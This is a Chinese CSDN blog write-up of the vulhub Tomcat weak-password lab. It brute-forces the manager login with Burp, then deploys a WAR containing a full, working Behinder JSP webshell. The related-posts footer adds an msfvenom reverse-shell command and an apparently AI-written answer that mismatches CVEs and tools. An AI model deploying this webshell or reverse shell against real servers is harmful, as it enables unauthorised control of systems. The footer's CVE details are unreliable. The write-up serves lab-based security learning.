漏洞复现(vulhub tomcat弱口令漏洞)

已于 2023-03-05 21:08:07 修改
阅读量681 收藏 3
点赞数 1
分类专栏: 网络安全 vulhub靶场 文章标签: web安全 Powered by 金山文档
于 2023-02-16 23:57:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53409748/article/details/129074621
版权

简介

Tomcat有一个管理后台,其用户名和密码在Tomcat安装目录下的conf/tomcat-users.xml文件中配置,不少管理员为了方便,经常采用弱口令。

Tomcat 支持在后台部署war包,可以直接将webshell部署到web目录下,如果tomcat后台管理用户存在弱口令,这很容易被利用上传webshell。

实验环境

靶机:使用docker搭建的 tomcat环境 (192.168.121.131)

攻击机: win10 (192.168.121.132)

开始复现

使用docker开启对应环境

cd /home/tbin/vulhub-master/tomcat/tomcat8 /进入漏洞所在的路径

docker-compose -up -d /启动docker

进入靶场:

使用burp抓取登录包:

提取参数,发现是base64加密,进行解密

发送到intruder模块进行爆破

在payloads里面选自用户自定义迭代器

第一部分上传用户名

第二部分选择上传一个“ : ”

第三部分为密码本:

在payload processing 里添加对应的base64加密

取消url自动转义

开始爆破

发现回显200则对应登录成功,对用户名和密码进行解密:

进行解密:用户名和密码都为 tomcat

登录成功

或者我们可以在docker中查看对应的文件得到用户名以及密码

  1. docker ps /查看容器对应的进程

  1. docker exec -it 119 /bin/bash /进入容器

  1. cat tomcat-users.xml /查看配置文件

同样可以得到用户名和密码

后台Getshell

登录到后台后可以通过部署 war 包进行 getshell

准备一个jsp木马(这里使用冰蝎自带)

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

将准备好的木马打包为war包

jar cvf tomcat11.war shell.jsp (或者压缩为zip后修改后缀为war)

部署war包到Tomcat Web应用程序管理者

应用列表已经出现上传的war包

访问无报错,上传成功

使用冰蝎进行连接

访问查看到了所有文件,复现成功

²⁰⁰²₀₂.₀₁T̶B̶
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2024-1938 Vulhub复现Tomcat文件包含漏洞复现_vulhubtomcat
2401_83974590的博客
04-11 344
漏洞编号:CVE-2020-1938、CNVD-2020-10487漏洞描述:Apache Tomcat文件包含漏洞是由Tomcat AJP协议存在缺陷而导致,可利用该漏洞通过构造特定参数进行文件包含操作,进而读取受影响Tomcat服务器上的Web应用目录下的任意文件,如配置文件或源代码等。此外,如果目标应用有文件上传功能,攻击者还可以利用这个漏洞配合文件包含来实现远程代码执行,从而控制整个系统。影响范围: Apache Tomcat 6风险评估:高危。
Tomcat弱口令扫描工具
07-18
Tomcat弱口令扫描工具,可自己写字典进行爆破。
Tomcat弱口令扫描器
05-08
弱口令扫描的工具有很多中,而在这其中,比较优秀的一款就是Tomcat,用起来很方便。希望上传给大家共享,也为了以后自己方便查找。
Tomcat弱口令专项扫描工具.zip
03-24
Tomcat弱口令扫描工具
Tomcat弱口令及war包漏洞复现(保姆级教程)
m0_69043895的博客
04-21 836
这里我们采用针对同一弱口令去爆破不同账号的方式进行猜解,将可能存在的username放入position1的位置,其次放置password在position3的位置,最后attack时爆破的顺序如下图,就不会针对同一账号锁定。CSDN上有个脚本利用的是占满tomcat缓存的方式绕过,当同一账号大于5次登录,就会采用脏数据去进行登录,直到缓存占满后,又会用剩下的可能存在的username进行登录。链接的地址是 /zip文件的前缀/文件名,比如我这里就是http://IP/shell/shell.jsp。
vulhub中Aapache Tomcat AJP 文件包含漏洞复现(CVE-2020-1938)
yougexiaojiuguan的博客
03-01 618
漏洞复现过程中的记录
vulhub靶场】Tomcat中间件漏洞复现
最新发布
M372109150的博客
05-04 1408
本文主要是对tomcat中间件相关漏洞复现,包括Tomcat AJP 任意文件读取/包含漏洞 (CVE-2020-1938)、Tomcat 任意文件写入漏洞 (CVE-2017-12615)以及Tomcat 弱密码和后端 Getshell 漏洞
Vulhub Tomcat弱口令getshell漏洞复现
W小哥
05-26 1456
一、漏洞描述 若空灵 二、漏洞原理 Tomcat支持通过后端部署war文件,因此我们可以直接将webshel​​l放置在web目录中。为了访问后端,需要权限。 后台管理 manager-gui (permission of html pages) manager-status (permission to view status) manager-script (permission of text interface and the status permission) manager-jmx (jmx
复现vulhub tomcat弱口令漏洞
m0_67463450的博客
02-17 261
本文简述了如何复现vulhubtomcat管理后台存在弱口令漏洞
Tomcat漏洞(弱口令war包)详解
xinyue9966的博客
02-17 4790
后台弱口令上传war包 影响版本:Tomcat版本:7.0–>8.0 影响说明:后台弱口令登录,上传webshell 环境说明:PHP5.5.38 、 Apache2.4.10、Tomcat 8.0.43 环境搭建 东塔靶场 漏洞原理 tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。 tomcat是一个中间件,在B/S架构中,浏览器发出的http请求经过tpmcat中间件,转发到最终的目的服务器上
vulhub复现tomcat8.0.43弱口令&war远程部署漏洞复现
m0_70483044的博客
07-19 2456
学习时间2022.7.18一日之计在于晨,一年之计在于春。
Tomcat弱口令扫描的工具.zip
03-31
Tomcat弱口令扫描工具,可自己写字典进行爆破。
Tomcat弱口令利用工具
09-03
Tomcat弱口令利用工具,很好用的工具
Tomcat 弱口令及文件上传漏洞复现
君莫hacker的博客
09-16 2999
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现 0x01 漏洞介绍 漏洞描述 漏洞编号 受影响版本 0x02 环境部署: 搭建一次,复现百次 靶机 ip:192.168.30.209 kali ip:192.168.30.182 0x03 漏洞复现 从github下载tomcat8的源码,我们可以查看到tomcat的默认登录名为tomcat,并且密码也为tomcat 点击Server Status进行登录 弱口令tomcat tomcat 直接登录成功 发现文件上传点
vulnhub靶场9:Thales
Genarior的专栏
06-24 145
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.50.190 LPORT=4444 -f war -o upfile.war //创建反弹shell payload。12、查看/home/thales/.ssh目录,发现私钥,拷贝下,使用ssh2john转下,并使用john破解。export TERM=xterm-256color //设置终端环境变量。10、查看/home/thales/note.txt,提示有个shell。
Tomcat后台管理漏洞复现(弱口令+上传webshell)_tomcat文件上传漏洞复现
04-15 704
web.xml 是这个应用的配置文件,而 classes 目录下则包含编译好的 servlet 类和 jsp,或者 servlet 所依赖的其他类(如 JavaBean)。1.3将抓到的包发送到爆破模块,快捷键ctrl+i,正常来说是用常见的弱口令字典去爆破,或者更强大的字典进行爆破,为了节省时间,这里就随便输入了几个账号密码。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然,如果是一个未知的后台登录,且可能存在弱口令,则使用Burp Suite进行抓包暴力破解,下面简单进行演示。
复现vulhub tomcat8弱口令漏洞
weixin_67813445的博客
02-13 158
Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。 tomcat用户名密码使用bash64方式进行加密。
vulhub靶场-tomcat漏洞复现
m0_62008601的博客
07-23 1258
tomcat漏洞复现合集
Tomcat弱口令漏洞
qq_43665434的博客
05-16 1870
Tomcat弱口令漏洞 漏洞原理:传送门 实验环境 主机 角色 IP centos8 漏洞靶机 192.168.1.80 kali msf生成木马,接收shell 192.168.1.128 windows10 攻击机 192.168.1.120 实验流程 开启漏洞靶机centos8 # 开启docker服务 service docker start # 切换到vulhub目录 cd /usr/sbin/vulhub/tomcat/tomcat8 # 创建镜像 docker
tomcat漏洞复现vulhub
08-21
复现Tomcat漏洞,你可以使用vulhub这个平台。Vulhub是一个提供了各种漏洞环境的Docker镜像集合,其中包括了Tomcat漏洞环境。你可以按照以下步骤进行复现: 1. 首先,确保你已经安装了Docker,并且已经启动了Docker服务。 2. 下载vulhub的代码库,你可以在GitHub上找到它:https://github.com/vulhub/vulhub 3. 进入vulhubTomcat漏洞环境目录:cd vulhub/tomcat/CVE-2017-12615 4. 使用Docker Compose启动Tomcat容器:docker-compose up -d 5. 等待容器启动完成后,你可以访问http://localhost:8080来查看Tomcat的欢迎页面。 6. 接下来,你可以使用漏洞复现工具来验证漏洞。在这个漏洞环境中,你可以使用https://github.com/doyensec/ajpfuzzer/releases/download/v0.6/ajpfuzzer_v0.6.jar这个AJP包构造器工具来构造恶意请求。 7. 下载ajpfuzzer_v0.6.jar工具。你可以使用wget命令来下载:wget https://github.com/doyensec/ajpfuzzer/releases/download/v0.6/ajpfuzzer_v0.6.jar 8. 使用ajpfuzzer_v0.6.jar工具来构造恶意请求,将包含任意代码的JSP文件上传到Tomcat服务器上。 9. 然后,你可以访问上传的JSP文件来执行恶意代码。 通过以上步骤,你就可以成功复现Tomcat漏洞。请注意,这仅仅是为了演示和学习目的,不要在未经授权的情况下使用这些技术攻击他人的系统。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [Tomcat系列漏洞复现——vulhub](https://blog.csdn.net/qq_45612828/article/details/125833415)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [vulhub靶场-tomcat漏洞复现](https://blog.csdn.net/m0_62008601/article/details/125922489)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值